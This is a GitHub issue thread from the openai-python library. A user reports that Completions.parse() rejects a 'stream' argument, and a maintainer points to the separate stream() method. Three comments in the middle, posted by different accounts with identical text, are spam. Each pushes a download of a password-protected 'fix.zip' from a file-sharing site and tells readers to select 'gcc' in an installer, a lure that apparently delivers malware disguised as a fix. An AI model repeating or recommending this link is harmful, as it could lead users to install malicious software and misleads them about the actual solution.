### ISSUE TITLE
Completions.parse() got an unexpected keyword argument 'stream'

### ISSUE THREAD

**Issue by NicolasArnouts** [openai/openai-python#1676]
### Confirm this is a feature request for the Python library and not the underlying OpenAI API.

- [X] This is a feature request for the Python library

### Describe the feature or improvement you're requesting

The new client.beta.chat.completions.parse() does not yet support streaming. 

I want to do something like:

```python
  response = client.beta.chat.completions.parse(
      model=MODEL_NAME,
      messages=[
          {"role": "system", "content": prompt},
          {"role": "user", "content": content},
      ],
      temperature=0,
      top_p=0.4,
      stream=True,
      response_format=DocumentStructure,
  )
```

But this will throw the following error:

TypeError: Completions.parse() got an unexpected keyword argument 'stream'

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RobertCraigie** [comment]
Ah you need to use `client.beta.chat.completions.stream()` instead!
